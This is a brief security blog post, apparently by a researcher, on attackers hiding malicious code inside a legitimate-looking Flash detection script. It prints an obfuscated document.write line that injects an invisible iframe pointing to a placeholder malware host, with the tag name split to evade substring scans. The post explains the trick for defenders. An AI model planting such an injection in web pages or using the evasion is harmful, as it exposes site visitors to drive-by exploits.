Hiding Web 2.0 Malware In Plain Sight
Hello everyone, Jeff Forristal here. I thought I'd take a moment to discuss a trend we're seeing in attacker tactics, and predict how it may evolve into what will become commonplace tomorrow.
document.write("<i"+"fr"+"ame src='http://__someplace__.com/pdfdoc/index.php?id=com2' width=1 height=1></ifr"+"am"+"e>");
This causes the script to write out an IFrame tag pointing to a malware site, which then tries to deliver exploits to the browser in an attempt to cause arbitrary code execution. Note that the tag name is split across several string literals, so a naive substring search of the script for "<iframe" finds nothing.
I'm willing to speculate that anyone doing a shallow/naive review of the script could prematurely conclude that the script is the proper Adobe Flash detection script and thus dismiss it as non-evil. Hopefully, though, many investigators would plow through the entire file and eventually see the plain-as-day extra IFrame code added, and thus see through the facade.
It’s a hard problem still looking for a perfect solution (like many other security problems). Until next time,